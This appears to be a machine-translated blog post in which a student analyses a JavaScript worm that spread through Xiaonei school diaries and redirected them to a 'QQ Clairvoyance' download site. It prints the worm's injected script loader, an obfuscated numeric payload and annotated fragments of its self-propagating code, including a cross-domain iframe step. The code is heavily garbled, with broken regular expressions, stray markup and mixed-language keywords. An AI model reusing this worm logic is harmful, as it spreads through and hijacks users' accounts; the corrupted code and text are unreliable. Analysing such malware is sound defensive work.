Mi diario escolar se cambió automáticamente a la dirección para descargar QQ Clairvoyance
Una vez estaba revisando el programa fuente de una página web de la intranet y accidentalmente descubrí un gusano de la intranet. Al principio, pensé que había algún problema con mi página web, así que. Lo abrí casualmente. Después de revisar las páginas web de varias personas, descubrí que muchas personas también tienen ese código en sus páginas web.
El código anterior aparece al principio del registro y solo se puede encontrar mirando el archivo fuente. Ajusta el vbscript para escribir y lo ajusta a lo siguiente:
set s=document. createElement(" script")
s.src=/detail/Info.do?url=www.sosoface.com&r= 1192875678218
En el gráfico, puede ver el tráfico los días Un gran aumento, que debería ser el momento de la infección del gusano. Las visitas diarias se dispararon de 0 a 500 millones de veces por día, lo que significa que el número de visitas a JPG alcanzó los 500 millones de veces por día, considerando aproximadamente a una persona. Puede visitar varias páginas. Se estima que al menos varios millones de personas estaban infectadas. Además, alguien en el campus descubrió este gusano hace unos dos o tres días y Sosoface también dejó de ejecutarse.
Después de analizar a los infectados. código, escribí los comentarios directamente en JS. El programa original no tenía una sola línea de comentarios.
Mire la función de inicio desde abajo:
var req = null
var step=null
var DiaryMonthUrlList="",DiaryUrlList="" ;
var timer=null;
var bIsBusy=false;
var myrand="46.115.50.124.115.127.119.47.48.127.107.115.35.35. 33.48.50.123.118.47.48.127.107.115.35.35.33.48.50.97.102.107.126.119.47.53.112.115.113.121.117.96.125.103.124.118.40.103. 96.126 .58.100.112.97.113.96.123.98.102.40.119.106.119.113. 103.102.119.58.65.102.96.64.119.100.119.96.97.119.58.48.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119. 127.119.126.87.102.119.117.60.102.124.119.127.103.113. 125.118.62.97.50.119.96.125.116.119.80.102.96.119.97.124.123.60.119.118.125.92.102.124.119.96.115.98.60.59.48.48.33.35.35 .115.107.12 7.48.48.58.118.91.107.80.102.124.119.127 .119.126.87.102 119.117.60.102.124.119.127.103.113.125.118.50.40.48.48.117.98.120.60.97.120.124.106.61.97.119.117.115.127 .123.61.127.125 113.60.119.113.115.116.125.97.125.97.60.101 .101.101.61.61.40 98.102.102.122.48.48.47.113.96.97.60.97.40.59.48.48.102.98.123.96.113.97.48.48.58.102.124.119.127.119.1 26.87.119.102.115 119.96.113.60.102.124.119.127. .103.113.125.118.47.97.50";
función my_HtmlDecode(str)
{
str=str.replace(/>/g,">. "); str.replace(/&/g, "&");
str=str.replace(/ /g," ");
str=str.replace(/" /g,"\"");
str=str.replace(/
/g,"\n");
str=str.
str=str.replace( /"/g,"\"");
p>
str=str.replace(/'/g,"'");
str=str.replace(/#/g, "#"); >str=str.replace(/(/g,"()").
str=str.replace(/)/g,")"); .replace(/"/g,"\"");
str=str.replace(/'/g,"'");
return str; >
}respuestaTexto;
i=text.indexOf("
if(-1==i); ){return}
i=text.indexOf("zz Webmaster Assistant
// Comencemos la infección. El primer paso es GetDiaryMonthList para obtener el archivo mensual del registro
step="GetDiaryMonthList";
Step="GetDiaryMonthList";
loadUrl("/MyBlog.do", "GET","");//loadUrl es un ajax función, Se utiliza para leer el contenido de la página
}
}
}
else if("xiaonei .com"==document. dominio ||"www.xiaonei.com"==document.domain)
{
// Si no es blog.xiaonei.p>// Esta URL es blog.xiaonei. com Dominio, es una implementación disfrazada de dominio cruzado
// Esta URL es el dominio blog.xiaonei.com, es una implementación disfrazada de dominio cruzado
// El autor. hace esto para infectarse una vez que visite la página de inicio de otra persona
var url=""
url=document.
if(url.indexOf) ("&")=-1)
return
step="WriteIframe"
loadUrl(url, "GET",);
}
}
}
Inicio( );